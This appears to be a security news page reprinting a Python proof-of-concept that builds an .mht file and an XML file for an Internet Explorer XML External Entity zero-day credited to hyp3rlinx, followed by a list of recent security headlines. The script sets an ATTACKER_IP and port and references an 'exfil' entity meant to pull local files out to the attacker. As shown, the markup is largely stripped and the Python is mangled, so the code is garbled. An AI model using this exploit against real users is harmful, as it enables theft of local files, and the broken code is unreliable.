Categories: Uncategorized

Internet Explorer Zero-day Exploit code

ATTACKER_IP=”localhost”
PORT=”8000″

mht_file=(
‘From:\n’
‘Subject:\n’
‘Date:\n’
‘MIME-Version: 1.0\n’
‘Content-Type: multipart/related; type=”text/html”;\n’
‘\tboundary=”=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_00000001″\n’
‘This is a multi-part message in MIME format.\n\n\n’

‘–=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_00000001\n’
‘Content-Type: text/html; charset=”UTF-8″\n’
‘Content-Location: main.htm\n\n’

‘\n’
‘\n’ ‘\n’ ‘\n’ ‘MSIE XXE 0day\n’ ‘\n’ ‘\n’ ‘\n’ ‘\n’ ‘\n’ ‘\n’ ‘%sp;\n’ ‘%param1;\n’ ‘]>\n’ ‘&exfil;\n’ ‘&exfil;\n’ ‘&exfil;\n’ ‘&exfil;\n’ ‘\n’ ‘\n’ ‘\n’ ‘\n’ ‘\n’ ‘\n’ ‘

\n’ ‘MSIE XML External Entity 0day PoC.\n’ ‘Discovery: hyp3rlinx\n’ ‘ApparitionSec\n’ ‘

\n’ ‘\n’ ‘\n\n\n’

‘–=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_00000001–‘
)

xml_file=(
‘\n’
‘”>\n’
‘\n’
‘”>\n’
)

def mk_msie_0day_filez(f,p):
f=open(f,”wb”)
f.write(p)
f.close()

if name == “main“:
mk_msie_0day_filez(“msie-xxe-0day.mht”,mht_file)
mk_msie_0day_filez(“datatears.xml”,xml_file)
print “Microsoft Internet Explorer XML External Entity 0day PoC.”
print “Files msie-xxe-0day.mht and datatears.xml Created!.”
print “Discovery: Hyp3rlinx / Apparition Security”

Credits: John Page (aka hyp3rlinx)

Balaji

BALAJI is an Ex-Security Researcher (Threat Research Labs) at Comodo Cybersecurity. Editor-in-Chief & Co-Founder - Cyber Security News & GBHackers On Security.

Recent Posts

Phobos Ransomware Admin as Part of International Hacking Operation

The U.S. Department of Justice unsealed criminal charges today against Evgenii Ptitsyn, a 42-year-old Russian national…

19 hours ago

Maxar Space Data Leak, Threat Actors Gain Unauthorized Access to the System

Maxar Space Systems, a leader in space technology and Earth intelligence solutions, has recently confirmed…

22 hours ago

Apache Kafka Vulnerability Let Attackers Escalate Privileges

A newly identified vulnerability tracked as CVE-2024-31141, has been discovered in Apache Kafka Clients that could allow attackers…

23 hours ago

Zohocorp ManageEngine ADAudit Plus SQL Injection Vulnerability

Zohocorp, the company behind ManageEngine, has released a security update addressing a critical SQL injection…

2 days ago

Citrix Virtual Apps & Desktops Zero-Day Vulnerability Exploited in the Wild

A critical new vulnerability has been discovered in Citrix’s Virtual Apps and Desktops solution, which…

2 days ago

Sonatype Nexus Repository Manager Hit by RCE & XSS Vulnerability

Sonatype, the company behind the popular Nexus Repository Manager, has issued security advisories addressing two…

2 days ago